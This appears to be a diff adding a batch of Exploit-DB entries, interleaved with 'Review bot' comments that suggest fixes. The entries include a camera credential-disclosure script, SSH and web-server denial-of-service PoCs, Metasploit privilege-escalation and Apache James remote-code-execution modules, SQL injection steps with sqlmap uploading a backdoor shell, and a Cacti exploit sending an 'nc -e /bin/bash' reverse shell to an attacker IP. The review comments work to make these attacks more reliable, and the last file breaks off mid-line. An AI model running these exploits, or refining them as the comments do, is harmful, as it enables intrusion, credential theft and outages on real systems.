+# [ << Accept-Ranges => bytes
+# [ << Server => thttpd/2.25b 29dec2003
+# [ << Content-Length => 25893
+# [ << Content-Type => application/octet-stream
+# [ << Last-Modified => Sat, 22 Feb 2020 14:10:00 GMT
+# [ << Client-Date => Sat, 22 Feb 2020 14:10:04 GMT
+# [ << Client-Peer => 192.168.200.49:8080
+# [ << Client-Response-Num => 1
+# [
+# [ Username : admin
+# [ Password : admin
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use Gzip::Faster 'gunzip';
+
+my $host = shift || ''; # Full path url to the store
+my $cmd = shift || ''; # show - Show configuration dump
+$host =~ s/\/$//;
+print "\033[2J"; #clear the screen
+print "\033[0;0H"; #jump to 0,0
+print "[ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure\n";
+print "[ ================================================================\n";
+print "[ Exploit Author: Todor Donev 2020 \n";
+if ($host !~ m/^http/){
+ print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
+ print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
+ exit;
+}
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+ $browser->timeout(30);
+ $browser->agent($user_agent);
+# my $target = $host."/config_backup.bin";
+# my $target = $host."/tmpfs/config_backup.bin";
+my $target = 
$host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
+print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
+print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
+my $gzipped = $response->content();
+my $config = gunzip($gzipped);
+print "[ \n";
+if ($cmd =~ /show/) {
+ print "[ >> Configuration dump...\n[\n";
+ print "[ ", $_, "\n" for split(/\n/,$config);
+ exit;
+} else {
+ print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
+ print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
+ exit;
+}
\ No newline at end of file
diff --git a/exploits/java/webapps/48119.txt b/exploits/java/webapps/48119.txt
new file mode 100644
index 000000000..67236c4f3
--- /dev/null
+++ b/exploits/java/webapps/48119.txt
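Review bot: The `# Exploit Title:` line says `Aptina AR0130 960P 1.3MP Camera` — an image sensor, not a product — while the banner, the `# Product Link:` and every `print` name the device as `ACE SECURITY WiP-90113 HD Camera`; the title should name the product so the entry is searchable and so readers do not apply it to every camera built on that sensor. The script body is otherwise the same logic as 48107/48110/48115/48118 with a different banner, so the same two caveats apply here: a 200 response whose body is not gzip data dies inside `gunzip($gzipped)` rather than reporting "not vulnerable", and because `$browser->request` never returns false, a connection failure is printed as `[ Exploit failed! Not vulnerable.`. A shared helper would avoid fixing the same lines five times, but within this file the two checks are one line each: `exit unless $response->is_success;` and `... unless substr($gzipped, 0, 2) eq "\x1f\x8b";`.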
@@ -0,0 +1,79 @@ +# Exploit Title: ManageEngine EventLog Analyzer 10.0 - Information Disclosure +# Date: 2020-02-23 +# Author:Scott Goodwin +# Vendor: https://www.manageengine.com/ +# Software Link: https://www.manageengine.com/products/eventlog/ +# CVE: CVE-2019-19774 + +Vulnerability Name: Authenticated Information Disclosure in ManageEngine EventLog Analyzer +Registered: CVE-2019-19774 + +Discoverer: +Scott Goodwin, OSCP +OCD Tech + +Vendor of Product: +ManageEngine + +Affected Product Code Base: +EventLog Analyzer - 10.0 SP1 + +Affected Component: +Affected ManageEngine endpoint: http://exampleclient:8400/event/runquery.do +This endpoint allows the ManageEngine user to execute commands against the +ManageEngine PostgreSQL database. + +Attack Type: +Remote + +Vulnerability Type: +Incorrect Access Control + +Vulnerability Impact: +Authenticated Information Disclosure + +Attack Vector: +To exploit the vulnerability, an authenticated user must execute a specially crafted +query against the ManageEngine database to bypass the built-in security controls and +extract credential data. + +Vulnerability Description: +An issue was discovered in Zoho ManageEngine EventLog Analyzer 10.0 SP1. +By running "select hostdetails from hostdetails" at the /event/runquery.do endpoint, +it is possible to bypass the security restrictions that prevent even administrative +users from viewing credential data stored in the database, and recover the MD5 hashes +of the accounts used to authenticate the ManageEngine platform to the managed machines +on the network (most often administrative accounts). Specifically, this bypasses the +following restrictions: a query cannot mention "password", and a query result cannot +have a "password" column. + +PoC: Run the database query: "select hostdetails from hostdetails" at the /event/runquery.do endpoint + +Reporting Timeline: +10/30/2019: This vulnerability was reported to ManageEngine via the +Zoho/ManageEngine Bug Bounty program. 
They acknowledged the initial report. +12/12/2019: Vulnerability registered +12/13/2019: Vulnerability acknowledged and update (12110) made available to ManageEngine +customers. +12/13/2019: Public disclosure + +Additional Information: +This query bypasses the following security restrictions implemented within Manage Engine: + 1. restrictions on queries that include the word "password". This query will output the + value stored in the "password" field, without the word "password" actually appearing in + the query. If the query contains the word "password" Manage Engine will not execute the query. + 2. restrictions on printing the password field to the screen in a column called "password". + If the results of the query include a columncalled "password", Manage Engine will mask the + password with a series of asterisks "". This query will output the entire contents of the table, + without formatting is as a table within the web interface, which leads to bypass of this security + control. + +Remediated Product Version: +ManageEngine EventLog Analyzer Build 12110 + +Reference: +https://www.manageengine.com/products/eventlog/ +https://www.manageengine.com/products/eventlog/features-new.html#release +https://gist.github.com/scottgoodwin90/19ccecdc9f5733c0a9381765cfc7fe39 +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19774 +https://ocd-tech.com \ No newline at end of file diff --git a/exploits/linux/dos/48121.py b/exploits/linux/dos/48121.py new file mode 100755 index 000000000..3c2f74592 --- /dev/null +++ b/exploits/linux/dos/48121.py 
@@ -0,0 +1,61 @@ +# Exploit Title: Go SSH servers 0.0.2 - Denial of Service (PoC) +# Author: Mark Adams +# Date: 2020-02-21 +# Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py +# CVE: CVE-2020-9283 +# +# Running this script may crash the remote SSH server if it is vulnerable. +# The GitHub repository contains a vulnerable and fixed SSH server for testing. +# +# $ python poc.py +# ./poc.py +# +# $ python poc.py localhost 2022 root +# Malformed auth request sent. This should cause a panic on the remote server. +# + +#!/usr/bin/env python + +import socket +import sys + +import paramiko +from paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST + +if len(sys.argv) != 4: + print('./poc.py ') + sys.exit(1) + +host = sys.argv[1] +port = int(sys.argv[2]) +user = sys.argv[3] + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.connect((host, port)) + +t = paramiko.Transport(sock) +t.start_client() + +t.lock.acquire() +m = paramiko.Message() +m.add_byte(cMSG_SERVICE_REQUEST) +m.add_string("ssh-userauth") +t._send_message(m) + +m = paramiko.Message() +m.add_byte(cMSG_USERAUTH_REQUEST) +m.add_string(user) +m.add_string("ssh-connection") +m.add_string('publickey') +m.add_boolean(True) +m.add_string('ssh-ed25519') + +# Send an SSH key that is too short (ed25519 keys are 32 bytes) +m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x15key-that-is-too-short') + +# Send an empty signature (the server won't get far enough to validate it) +m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x00') + +t._send_message(m) + +print('Malformed auth request sent. This should cause a panic on the remote server.') \ No newline at end of file diff --git a/exploits/linux/local/48131.rb b/exploits/linux/local/48131.rb new file mode 100755 index 000000000..15f0e22cb --- /dev/null +++ b/exploits/linux/local/48131.rb 
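Review bot: The shebang `#!/usr/bin/env python` is placed after the comment header (line 17 of the file), where it is just another comment, so the script is not directly executable, and the usage text `print('./poc.py ')` no longer names the three arguments read from `sys.argv` right below it (the names appear to have been lost). Move the shebang to line 1 and restore the usage string, e.g. `print('./poc.py <host> <port> <user>')`. `t.lock.acquire()` is also never released; wrapping the two `_send_message` calls in `with t.lock:` would make the intent explicit and release it on any exception.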
@@ -0,0 +1,115 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Diamorphine Rootkit Signal Privilege Escalation', + 'Description' => %q{ + This module uses Diamorphine rootkit's privesc feature using signal + 64 to elevate the privileges of arbitrary processes to UID 0 (root). + + This module has been tested successfully with Diamorphine from `master` + branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'm0nad', # Diamorphine + 'bcoles' # Metasploit + ], + 'DisclosureDate' => '2013-11-07', # Diamorphine first public commit + 'References' => + [ + ['URL', 'https://github.com/m0nad/Diamorphine'] + ], + 'Platform' => ['linux'], + 'Arch' => [ARCH_X86, ARCH_X64], + 'SessionTypes' => ['shell', 'meterpreter'], + 'Targets' => [['Auto', {}]], + 'Notes' => + { + 'Reliability' => [ REPEATABLE_SESSION ], + 'Stability' => [ CRASH_SAFE ] + }, + 'DefaultTarget' => 0)) + register_options [ + OptInt.new('SIGNAL', [true, 'Diamorphine elevate signal', 64]) + ] + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def signal + datastore['SIGNAL'].to_s + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload_and_chmodx(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + write_file path, data + chmod path, 0755 + end + + def cmd_exec_elevated(cmd) + vprint_status "Executing #{cmd} ..." 
+ res = cmd_exec("sh -c 'kill -#{signal} $$ && #{cmd}'").to_s + vprint_line res unless res.blank? + res + end + + def check + res = cmd_exec_elevated 'id' + + if res.include?('invalid signal') + return CheckCode::Safe("Signal '#{signal}' is invalid") + end + + unless res.include?('uid=0') + return CheckCode::Safe("Diamorphine is not installed, or incorrect signal '#{signal}'") + end + + CheckCode::Vulnerable("Diamorphine is installed and configured to handle signal '#{signal}'.") + end + + def exploit + unless check == CheckCode::Vulnerable + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + payload_name = ".#{rand_text_alphanumeric 8..12}" + payload_path = "#{base_dir}/#{payload_name}" + upload_and_chmodx payload_path, generate_payload_exe + register_file_for_cleanup payload_path + + cmd_exec_elevated "#{payload_path} & echo " + end +end \ No newline at end of file diff --git a/exploits/linux/remote/48130.rb b/exploits/linux/remote/48130.rb new file mode 100755 index 000000000..71e4c3c92 --- /dev/null +++ b/exploits/linux/remote/48130.rb 
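Review bot: `check` returns `CheckCode::Vulnerable` on any session that already runs as root, because it only looks for `uid=0` in the output of `id` after the signal, and a root session prints `uid=0` whether or not Diamorphine handled the signal; `exploit` tests `is_root?` only after `check` has already returned Vulnerable, so that branch can never produce a meaningful result. Test the precondition first, e.g. `return CheckCode::Unknown('Session already has root privileges, cannot verify elevation') if is_root?` at the top of `check`. The `res.include?('invalid signal')` test depends on the wording of the shell's error message, which varies between sh implementations, so a comment marking it as best-effort would help the next maintainer. `cmd_exec_elevated` also interpolates `cmd` into a single-quoted `sh -c '...'` string, which breaks on any single quote in `cmd`; the current callers pass fixed strings, but a comment stating that constraint on the method is warranted.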
@@ -0,0 +1,198 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::CmdStager + + def initialize(info={}) + super(update_info(info, + 'Name' => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write", + 'Description' => %q{ + This module exploits a vulnerability that exists due to a lack of input + validation when creating a user. Messages for a given user are stored + in a directory partially defined by the username. By creating a user + with a directory traversal payload as the username, commands can be + written to a given directory. To use this module with the cron + exploitation method, run the exploit using the given payload, host, and + port. After running the exploit, the payload will be executed within 60 + seconds. Due to differences in how cron may run in certain Linux + operating systems such as Ubuntu, it may be preferable to set the + target to Bash Completion as the cron method may not work. If the target + is set to Bash completion, start a listener using the given payload, + host, and port before running the exploit. After running the exploit, + the payload will be executed when a user logs into the system. For this + exploitation method, bash completion must be enabled to gain code + execution. This exploitation method will leave an Apache James mail + object artifact in the /etc/bash_completion.d directory and the + malicious user account. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Palaczynski Jakub', # Discovery + 'Matthew Aberegg', # Metasploit + 'Michael Burkey' # Metasploit + ], + 'References' => + [ + [ 'CVE', '2015-7611' ], + [ 'EDB', '35513' ], + [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ] + ], + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Targets' => + [ + [ 'Bash Completion', { + 'ExploitPath' => 'bash_completion.d', + 'ExploitPrepend' => '', + 'DefaultOptions' => { 'DisablePayloadHandler' => true, 'WfsDelay' => 0 } + } ], + [ 'Cron', { + 'ExploitPath' => 'cron.d', + 'ExploitPrepend' => '* * * * * root ', + 'DefaultOptions' => { 'DisablePayloadHandler' => false, 'WfsDelay' => 90 } + } ] + ], + 'Privileged' => true, + 'DisclosureDate' => "Oct 1 2015", + 'DefaultTarget' => 1, + 'CmdStagerFlavor'=> [ 'bourne', 'echo', 'printf', 'wget', 'curl' ] + )) + register_options( + [ + OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]), + OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]), + OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ]), + OptString.new('POP3PORT', [false, 'Port for POP3 Apache James Service', '110' ]), + Opt::RPORT(25) + ]) + import_target_defaults + end + + def check + # SMTP service check + connect + smtp_banner = sock.get_once + disconnect + unless smtp_banner.to_s.include? "JAMES SMTP Server" + return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server") + end + + # James Remote Administration Tool service check + connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']}) + admin_banner = sock.get_once + disconnect + unless admin_banner.to_s.include? 
"JAMES Remote Administration Tool" + return CheckCode::Safe("Target is not JAMES Remote Administration Tool") + end + + # Get version number + version = admin_banner.scan(/JAMES Remote Administration Tool ([\d\.]+)/).flatten.first + # Null check + unless version + return CheckCode::Detected("Could not determine JAMES Remote Administration Tool version") + end + # Create version objects + target_version = Gem::Version.new(version) + vulnerable_version = Gem::Version.new("2.3.2") + + # Check version number + if target_version > vulnerable_version + return CheckCode::Safe + elsif target_version == vulnerable_version + return CheckCode::Appears + elsif target_version < vulnerable_version + return CheckCode::Detected("Version #{version} of JAMES Remote Administration Tool may be vulnerable") + end + end + + def execute_james_admin_tool_command(cmd) + username = datastore['USERNAME'] + password = datastore['PASSWORD'] + connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']}) + sock.get_once + sock.puts(username + "\n") + sock.get_once + sock.puts(password + "\n") + sock.get_once + sock.puts(cmd) + sock.get_once + sock.puts("quit\n") + disconnect + end + + def cleanup + return unless target['ExploitPath'] == "cron.d" + # Delete mail objects containing payload from cron.d + username = "../../../../../../../../etc/cron.d" + password = @account_password + begin + connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['POP3PORT']}) + sock.get_once + sock.puts("USER #{username}\r\n") + sock.get_once + sock.puts("PASS #{password}\r\n") + sock.get_once + sock.puts("dele 1\r\n") + sock.get_once + sock.puts("quit\r\n") + disconnect + rescue + print_bad("Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password '#{@account_password}'") + end + + # Delete malicious user + delete_user_command = "deluser ../../../../../../../../etc/cron.d\n" + execute_james_admin_tool_command(delete_user_command) + end + + def 
execute_command(cmd, opts = {}) + # Create malicious user with randomized password (message objects for this user will now be stored in /etc/bash_completion.d or /etc/cron.d) + exploit_path = target['ExploitPath'] + @account_password = Rex::Text.rand_text_alpha(8..12) + add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} #{@account_password}\n" + execute_james_admin_tool_command(add_user_command) + + # Send payload via SMTP + payload_prepend = target['ExploitPrepend'] + connect + sock.puts("ehlo admin@apache.com\r\n") + sock.get_once + sock.puts("mail from: <'@apache.com>\r\n") + sock.get_once + sock.puts("rcpt to: <../../../../../../../../etc/#{exploit_path}>\r\n") + sock.get_once + sock.puts("data\r\n") + sock.get_once + sock.puts("From: admin@apache.com\r\n") + sock.puts("\r\n") + sock.puts("'\n") + sock.puts("#{payload_prepend}#{cmd}\n") + sock.puts("\r\n.\r\n") + sock.get_once + sock.puts("quit\r\n") + sock.get_once + disconnect + end + + def execute_cmdstager_end(opts) + if target['ExploitPath'] == "cron.d" + print_status("Waiting for cron to execute payload...") + else + print_status("Payload will be triggered when someone logs onto the target") + print_warning("You need to start your handler: 'handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}'") + print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password '#{@account_password}' to fully clean up exploit artifacts.") + end + end + + def exploit + execute_cmdstager(background: true) + end + +end \ No newline at end of file diff --git a/exploits/multiple/webapps/48108.txt b/exploits/multiple/webapps/48108.txt new file mode 100644 index 000000000..56a6051ca --- /dev/null +++ b/exploits/multiple/webapps/48108.txt @@ -0,0 +1 @@ +1 \ No newline at end of file 
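Review bot: `execute_james_admin_tool_command` discards every response it reads, so a rejected admin login or a failed `adduser` is never noticed and `execute_command` goes on to deliver the message to a recipient that may not exist. Capture the reply to the command and return it, `res = sock.get_once` after `sock.puts(cmd)` with `res` as the method's last expression, then check it at the `add_user_command` call site before sending mail. `cleanup` reads `@account_password`, which is only assigned inside `execute_command`, so a failure before that point runs the POP3 login with a nil password and then reports a second, confusing failure; a guard such as `return unless @account_password` before the `begin` would avoid that. The traversal prefix `../../../../../../../../etc/` is repeated verbatim in `cleanup`, `execute_command` and `execute_cmdstager_end`; a single helper returning `"../../../../../../../../etc/#{target['ExploitPath']}"` would keep the three in step.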
diff --git a/exploits/php/webapps/48109.txt b/exploits/php/webapps/48109.txt new file mode 100644 index 000000000..148db2beb --- /dev/null +++ b/exploits/php/webapps/48109.txt @@ -0,0 +1,21 @@ +# Title : AMSS++ v 4.31 - 'id' SQL Injection +# Author : indoushka +# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) +# Vendor: http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar +# Dork: แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++" +# CVE: N/A + +# poc : + +[+] Dorking İn Google Or Other Search Enggine. + +[+] Use payload : /modules/mail/main/maildetail.php?id=174 + +[+] http://127.0.0.1/amssplus_4_31_install/amssplus/modules/mail/main/maildetail.php?id=1 <==== inject here + + +Greetings to :========================================================================================================================= + | +jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | + | +======================================================================================================================================= \ No newline at end of file diff --git a/exploits/php/webapps/48113.txt b/exploits/php/webapps/48113.txt new file mode 100644 index 000000000..8443e103a --- /dev/null +++ b/exploits/php/webapps/48113.txt @@ -0,0 +1,29 @@ +# Title: CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin) +# Date: 2020-02-21 +# Exploit Author: J3rryBl4nks +# Vendor Homepage: https://sourceforge.net/u/auieo/profile/ +# Software Link: https://sourceforge.net/projects/candidats/files/#Version 2.1.0 +# Tested on Ubuntu 19/Kali Rolling + +# The Candid ATS Web application is vulnerable to CSRF to add a new admin user: +#CSRF Proof of Concept: + + + + +
+ + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/48114.txt b/exploits/php/webapps/48114.txt new file mode 100644 index 000000000..4ae5f0111 --- /dev/null +++ b/exploits/php/webapps/48114.txt @@ -0,0 +1,23 @@ +# Title: AMSS++ 4.7 - Backdoor Admin Account +# Author: indoushka +# Date: 2020-02-23 +# Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) +# Vendor : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar +# Dork : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++" +==================================================================================================================================== + +poc : + + +[+] Dorking İn Google Or Other Search Enggine. + +[+] Use Login : admin & 1234 + +[+] http://127.0.0.1/innoobec/index.php + + +Greetings to :========================================================================================================================= + | +jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | + | +======================================================================================================================================= \ No newline at end of file diff --git a/exploits/php/webapps/48117.txt b/exploits/php/webapps/48117.txt new file mode 100644 index 000000000..92ad9ca8c --- /dev/null +++ b/exploits/php/webapps/48117.txt 
@@ -0,0 +1,16 @@ +# Exploit Title: ATutor 2.2.4 - 'id' SQL Injection +# Date: 2020-02-23 +# Exploit Author: Andrey Stoykov +# Vendor Homepage: https://atutor.github.io/ +# Software Link: https://sourceforge.net/projects/atutor/files/latest/download +# Version: ATutor 2.2.4 +# Tested on: LAMP on Ubuntu 18.04 + +Steps to Reproduce: + +1) Login as admin user +2) Browse to the following URL: +http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17' +3) Exploiting with SQLMAP: +//Must supply valid User-Agent otherwise, there will be errors. +sqlmap --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --dbms=mysql -u "http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17*" --cookie= \ No newline at end of file diff --git a/exploits/php/webapps/48122.txt b/exploits/php/webapps/48122.txt new file mode 100644 index 000000000..b95711492 --- /dev/null +++ b/exploits/php/webapps/48122.txt 
@@ -0,0 +1,61 @@ +# Title: eLection 2.0 - 'id' SQL Injection +# Date: 2020-02-21 +# Exploit Author: J3rryBl4nks +# Vendor Homepage: https://sourceforge.net/projects/election-by-tripath/ +# Software Link: https://sourceforge.net/projects/election-by-tripath/files/#Version 2.0 +# Tested on Ubuntu 19/Kali Rolling + +# The eLection Web application is vulnerable to authenticated SQL Injection which leads to remote code execution: +# Login to the admin portal and browse to the candidates section. Capture the request in BurpSuite and save it to file: + +POST /election/admin/ajax/op_kandidat.php HTTP/1.1 +Host: HOSTNAME +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://HOSTNAME/election/admin/kandidat.php?_ +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 17 +Connection: close +Cookie: el_listing_panitia=5; el_mass_adding=false; el_listing_guru=5; el_listing_siswa=5; PHPSESSID=b4f0c3bbccd80e9d55fbe0269a29f96a; el_lang=en-us + +aksi=fetch&id=256 + + + +Send the request to SQLMap with the following parameters: + + sqlmap -r getcandidate --level=5 --risk=3 --os-shell -p id + + +SQLMap will find the injection: + + --- + Parameter: id (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: aksi=fetch&id=256 AND 8584=8584 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: aksi=fetch&id=256 AND (SELECT 8551 FROM (SELECT(SLEEP(5)))nYfJ) + + Type: UNION query + Title: Generic UNION query (NULL) - 5 columns + Payload: aksi=fetch&id=-9798 UNION ALL SELECT NULL,NULL,CONCAT(0x7170707171,0x676d755461434e486f49475051707357694861534e664f416f434269487042545a76454f5843584b,0x71717a7871),NULL,NULL-- dWMc + --- + + + [09:39:07] [WARNING] unable to automatically parse any web server path + [09:39:07] [INFO] 
trying to upload the file stager on '/opt/lampp/htdocs/election/' via LIMIT 'LINES TERMINATED BY' method + [09:39:07] [INFO] the file stager has been successfully uploaded on '/opt/lampp/htdocs/election/' - http://HOSTNAME/election/tmpumlfm.php + [09:39:07] [INFO] the backdoor has been successfully uploaded on '/opt/lampp/htdocs/election/' - http://HOSTNAME/election/tmpbpfkq.php + [09:39:07] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER + os-shell> + + +Due to the way the setup of the application requires you to change permissions on the directory of the web app, you should be able to get a shell. + +https://github.com/J3rryBl4nks/eLection-TriPath-/blob/master/SQLiIntoRCE.md \ No newline at end of file diff --git a/exploits/php/webapps/48128.py b/exploits/php/webapps/48128.py new file mode 100755 index 000000000..0fccb05fa --- /dev/null +++ b/exploits/php/webapps/48128.py 
@@ -0,0 +1,102 @@ +# Exploit Title: Cacti 1.2.8 - Remote Code Execution +# Date: 2020-02-03 +# Exploit Author: Askar (@mohammadaskar2) +# CVE: CVE-2020-8813 +# Vendor Homepage: https://cacti.net/ +# Version: v1.2.8 +# Tested on: CentOS 7.3 / PHP 7.1.33 + +#!/usr/bin/python3 + +import requests +import sys +import warnings +from bs4 import BeautifulSoup +from urllib.parse import quote + +warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4') + + +if len(sys.argv) !=3D 6: + print("[~] Usage : ./Cacti-exploit.py url username password ip port") + exit() + +url =3D sys.argv[1] +username =3D sys.argv[2] +password =3D sys.argv[3] +ip =3D sys.argv[4] +port =3D sys.argv[5] + +def login(token): + login_info =3D { + "login_username": username, + "login_password": password, + "action": "login", + "__csrf_magic": token + } + login_request =3D request.post(url+"/index.php", login_info) + login_text =3D login_request.text + if "Invalid User Name/Password Please Retype" in login_text: + return False + else: + return True + +def enable_guest(token): + request_info =3D { + "id": "3", + "section25": "on", + "section7": "on", + "tab": "realms", + "save_component_realm_perms": 1, + "action": "save", + "__csrf_magic": token + } + enable_request =3D request.post(url+"/user_admin.php?header=3Dfalse", r= +equest_info) + if enable_request: + return True + else: + return False + +def send_exploit(): + payload =3D ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port) + cookies =3D {'Cacti': quote(payload)} + requests.get(url+"/graph_realtime.php?action=3Dinit", cookies=3Dcookies= +) + +request =3D requests.session() +print("[+]Retrieving login CSRF token") +page =3D request.get(url+"/index.php") +html_content =3D page.text +soup =3D BeautifulSoup(html_content, "html5lib") +token =3D soup.findAll('input')[0].get("value") +if token: + print("[+]Token Found : %s" % token) + print("[+]Sending creds ..") + login_status =3D login(token) + if login_status: + 
print("[+]Successfully LoggedIn") + print("[+]Retrieving CSRF token ..") + page =3D request.get(url+"/user_admin.php?action=3Duser_edit&id=3D3= +&tab=3Drealms") + html_content =3D page.text + soup =3D BeautifulSoup(html_content, "html5lib") + token =3D soup.findAll('input')[1].get("value") + if token: + print("[+]Making some noise ..") + guest_realtime =3D enable_guest(token) + if guest_realtime: + print("[+]Sending malicous request, check your nc ;)") + send_exploit() + else: + print("[-]Error while activating the malicous account") + + else: + print("[-] Unable to retrieve CSRF token from admin page!") + exit() + + else: + print("[-]Cannot Login!") +else: + print("[-] Unable to retrieve CSRF token!") + exit() \ No newline at end of file diff --git a/exploits/windows/dos/48111.py b/exploits/windows/dos/48111.py new file mode 100755 index 000000000..59751311c --- /dev/null +++ b/exploits/windows/dos/48111.py 
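Review bot: The file is committed in quoted-printable form: every `=` appears as `=3D` and long lines carry a soft-wrap `=` followed by a continuation (e.g. `r= +equest_info)` and `cookies=3Dcookies= +)`), so the script does not parse as Python at all. Decode the encoding before committing so that, for instance, `url =3D sys.argv[1]` becomes `url = sys.argv[1]` and `category=3DUserWarning` becomes `category=UserWarning`. The shebang `#!/usr/bin/python3` sits on line 9 after the header comments, where it has no effect; it belongs on line 1. `bs4` and `requests` are third-party dependencies the header does not mention; a `# Requires: requests, beautifulsoup4` line would save the reader a failed first run.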
@@ -0,0 +1,89 @@ +# Title: Quick N Easy Web Server 3.3.8 - Denial of Service (PoC) +# Date: 2019-12-25 +# Author: Cody Winkler +# Vendor Homepage: https://www.pablosoftwaresolutions.com/ +# Software Link: https://www.pablosoftwaresolutions.com/html/quick__n_easy_web_server.html +# Version: <= 3.3.8 +# Tested on: Windows 10 x64 (wow64) +# CVE: N/A + +#!/usr/bin/env python +""" +Remote Unauthenticated Heap Memory Corruption in Quick N' Easy Web Server <= 3.3.8 + +[+] Usage: python quickwww_heap338.py + +$ python exploit.py 127.0.0.1 80 +""" + +from __future__ import print_function +import socket +import sys +import re + +host = sys.argv[1] +port = int(sys.argv[2]) + +crashed = r'(503 Service Unavailable)' + +http_req = "GET / HTTP/1.1\r\n" +http_req += "Host: " + "A"*15000 + "\r\n" # 50000 A's causes an interesting double free in OLEAUT32!VariantClear() when attached to debugger +http_req += "User-Agent: A\r\n" +http_req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +http_req += "Accept-Language: en-US,en;q=0.5\r\n" +http_req += "Cookie: A\r\n" +http_req += "Connection: Close\r\n" +http_req += "Upgrade-Insecure-Requests: 0\r\n" +http_req += "Cache-control: max-age=0\r\n\r\n" + +def main(): + + print("[+] Remote Heap Memory Corruption in Quick n Easy Web Server <= 3.3.8") + i = 1 + while( i < 1500): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.send(http_req) + print("[+] 